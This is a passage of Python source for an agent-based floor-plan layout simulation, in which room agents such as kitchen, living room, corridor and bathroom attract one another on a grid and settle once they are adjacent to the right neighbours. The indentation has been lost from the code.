# if type(i) is OffRoomAgent:
# self.stable_wc1 += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_wc1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_wc1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_wc1 == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class WCRoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, wc_rooms=1, agent_width=3, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.wc_rooms = wc_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_wc = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.wc_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.wc_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_wc = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is SL1RoomAgent:
# self.stable_wc += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_wc += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_wc += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_wc == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class LivRoomAgent(Attractor):
"""
An agent representing a Living room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, liv_rooms=1, agent_width=7, agent_height=5, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.liv_rooms = liv_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_liv = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.liv_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.liv_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_liv = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is EntryRoomAgent:
# self.stable_liv += 1
# if type(i) is BathRoomAgent:
# self.stable_liv += 1
# if type(i) is OffRoomAgent:
# self.stable_liv += 1
# if type(i) is CorrRoomAgent:
# self.stable_liv += 1
# if type(i) is KitRoomAgent:
# self.stable_liv += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is BathRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is OffRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is KitRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_liv += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_liv += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_liv == 5:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class EntryRoomAgent(Attractor):
"""
An agent representing an Entry room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, entry_rooms=1, agent_width=2, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.entry_rooms = entry_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_entry = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.entry_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.entry_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_entry = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_entry += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_entry += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_entry += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_entry == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class KitRoomAgent(Attractor):
"""
An agent representing a Kitchen with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, kit_rooms=1, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.kit_rooms = kit_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_kit = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.kit_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.kit_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.west_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_kit = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_kit += 1
# # if type(i) is CorrRoomAgent:
# # self.stable_kit += 1
# # if type(i) is BathRoomAgent:
# # self.stable_kit += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_kit += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_kit += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is CorrRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_kit += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_kit += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
# elif type(agent) is BathRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_kit += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_kit += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_kit == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class OffRoomAgent(Attractor):
"""
An agent representing an Office room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, off_rooms=1, agent_width=4, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.off_rooms = off_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_off = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.off_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.off_rooms > 0:
if random.randint(1,4) == 4:
self.west_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WC1RoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_off = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_off += 1
# if type(i) is WC1RoomAgent:
# self.stable_off += 1
# # if type(i) is CorrRoomAgent:
# # self.stable_off += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_off += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_off += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is WC1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_off += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_off += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is CorrRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_off += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_off += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_off == 2:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
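# A minimal sketch, not part of the original model: the recurring
# `random.randint(1, n) == n` gates in step() fire with probability 1/n
# (and `random.randint(1, 1) == 1` always fires). A named helper makes the
# intent explicit, e.g. `if _one_in(20): self.grid_attraction_5()`:
def _one_in(n):
    """True with probability 1/n."""
    return random.randint(1, n) == n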
class CorrRoomAgent(Attractor):
"""
    An agent representing a corridor with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, corr_rooms=1, agent_width=1, agent_height=12, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.corr_rooms = corr_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_corr = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.corr_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.corr_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SLRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_corr = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is SL1RoomAgent:
# self.stable_corr += 1
# if type(i) is SLRoomAgent:
# self.stable_corr += 1
# if type(i) is LivRoomAgent:
# self.stable_corr += 1
# # if type(i) is KitRoomAgent:
# # self.stable_corr += 1
# # if type(i) is OffRoomAgent:
# # self.stable_corr += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is SLRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_corr += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_corr += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is KitRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_corr += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_corr += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
# elif type(agent) is OffRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_corr += 1
# elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
# and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_corr += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_corr == 4:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class BathRoomAgent(Attractor):
"""
    An agent representing a bathroom with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, bath_rooms=1, agent_width=4, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.bath_rooms = bath_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_bath = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.bath_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.bath_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_bath = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is LivRoomAgent:
# self.stable_bath += 1
# # if type(i) is KitRoomAgent:
# # self.stable_bath += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_bath += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_bath += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
# elif type(agent) is KitRoomAgent:
# if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
# and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
# if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
# self.stable_bath += 1
        # elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
        # and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
# if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
# self.stable_bath += 1
# # shortest path finder algorithm
# print(self.astar_algorithm(agent))
# for i in self.astar_path:
# self.move_agent_with_dimensions(i)
if self.stable_bath == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
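# A minimal sketch of the scheduler this module assumes (hypothetical; the
# real BuildingModel is defined elsewhere). The step()/advance() split used
# by the agents above matches Mesa's SimultaneousActivation, which computes
# every agent's next move before applying any of them:
#
# from mesa import Model
# from mesa.time import SimultaneousActivation
#
# class BuildingModel(Model):
#     def __init__(self, agents):
#         super().__init__()
#         self.schedule = SimultaneousActivation(self)
#         self.stable_pos = 0
#         for agent in agents:
#             self.schedule.add(agent)
#
#     def step(self):
#         self.stable_pos = 0
#         self.schedule.step()  # all step() calls first, then all advance()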
